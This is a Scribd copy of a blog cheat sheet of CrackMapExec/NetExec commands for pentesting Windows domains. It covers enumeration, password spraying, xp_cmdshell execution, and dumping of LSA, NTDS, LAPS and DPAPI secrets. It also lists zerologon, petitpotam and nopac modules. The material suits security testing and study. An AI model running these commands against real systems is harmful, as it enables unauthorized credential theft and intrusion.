KEMBAR78
CrackMapExec and NetExec Cheat Sheet | PDF | User (Computing) | Password
Scribd
Upload
1K views10 pages

CrackMapExec and NetExec Cheat Sheet

The document provides a cheat sheet of useful commands for CrackMapExec and NetExec for pentesting, including commands for enumeration, password spraying, dumping secrets, and useful modules.

Uploaded by

setyahangga3
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
1K views10 pages

CrackMapExec and NetExec Cheat Sheet

The document provides a cheat sheet of useful commands for CrackMapExec and NetExec for pentesting, including commands for enumeration, password spraying, dumping secrets, and useful modules.

Uploaded by

setyahangga3
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

CrackMapExec and NetExec Cheat Sheet

seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/

A cheat sheet for CrackMapExec and NetExec, featuring useful commands and modules for different
services to use during Pentesting

CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)

1/10
NetExec: https://github.com/Pennyw0rth/NetExec

Installation: https://www.netexec.wiki/getting-started/installation

The same commands for crackmapexec would also work for NetExec

Other names: cme, nxc

Enumeration

Initial Enumeration
bash

crackmapexec smb
target

Null Authentication
bash

crackmapexec smb target -u ''


-p ''

Guest Authentication
bash

crackmapexec smb target -u 'guest'


-p ''

List Shares
bash

crackmapexec smb target -u '' -p '' --


shares

2/10
bash

crackmapexec smb target -u username -p password --


shares

List Usernames
bash

crackmapexec smb target -u '' -p '' --


users

bash

crackmapexec smb target -u '' -p '' --rid-


brute

bash

crackmapexec smb target -u username -p password --


users

Local Authentication
bash

crackmapexec smb target -u username -p password --


local-auth

Using Kerberos
bash

crackmapexec smb target -u username -p


password -k

Check for hosts that have SMB signing disabled

3/10
bash

crackmapexec smb target(s) --gen-relay-list


relay.txt

Spraying

Password Spray
bash

crackmapexec smb target -u users.txt -p password --continue-on-


success

bash

crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-


success

bash

crackmapexec ssh target(s) -u username -p password --continue-on-


success

SMB

All In One
bash

crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --


rid-brute --sessions --users --shares --pass-pol

Spider_plus Module

4/10
bash

crackmapexec smb target -u username -p password -M


spider_plus

bash

crackmapexec smb target -u username -p password -M spider_plus -o


READ_ONLY=false

Dump a specific file


bash

crackmapexec smb target -u username -p password -k --get-file target_file output_file --share


sharename

LDAP

Enumerate users using ldap


bash

crackmapexec ldap target -u '' -p '' --


users

All In One
bash

crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-


required --admin-count --users --groups

WMI

5/10
bash

cme wmi target(s) -d domain -u username -p password [-H hash] -M


mimikatz

MSSQL

Authentication
bash

crackmapexec mssql target -u username -p


password

Execute commands using xp_cmdshell

-X for powershell and -x for cmd

bash

crackmapexec mssql target -u username -p password -x


command_to_execute

Get a file
bash

crackmapexec mssql target -u username -p password --get-file output_file


target_file

Secrets Dump

Dump LSA secrets


bash

crackmapexec smb target -u username -p password --local-auth


--lsa

6/10
gMSA
bash

crackmapexec ldap target -u username -p password --gmsa-convert-


id id

bash

crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa


gmsa_account

Group Policy Preferences


bash

crackmapexec smb target -u username -p password -M


gpp_password

Dump LAPS password


bash

crackmapexec smb target -u username -p password -


-laps

Dump dpapi credentials


bash

crackmapexec smb target -u username -p password --laps --


dpapi

Dump NTDS.dit

7/10
bash

crackmapexec smb target -u username -p password -


-ntds

Asreproast
bash

crackmapexec ldap target -u username -p password --asreproast


asrep.txt

Bloodhound
bash

crackmapexec ldap target -u username -p password --bloodhound -ns ip --


collection All

Useful Modules

Webdav
Checks whether the WebClient service is running on the target

bash

crackmapexec smb ip -u username -p password -M


webdav

Veeam
Extracts credentials from local Veeam SQL Database

bash

crackmapexec smb target -u username -p password -M


veeam

8/10
slinky
Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in
all shares with write permissions

bash

crackmapexec smb ip -u username -p password -M


slinky

ntdsutil
Dump NTDS with ntdsutil

bash

crackmapexec smb ip -u username -p password -M


ntdsutil

ldap-checker
Checks whether LDAP signing and binding are required and/or enforced

bash

cme ldap target -u username -p password -M ldap-


checker

bash

crackmapexec smb target -u username -p password -M


zerologon

bash

crackmapexec smb target -u username -p password -M


petitpotam

9/10
bash

crackmapexec smb target -u username -p password -M


nopac

Check the MachineAccountQuota


bash

crackmapexec ldap target -u username -p password -


M maq

ADCS Enumeration
bash

crackmapexec ldap target -u username -p password -M


adcs

Author: serioton
Link: https://seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
cheatsheet

10/10

You might also like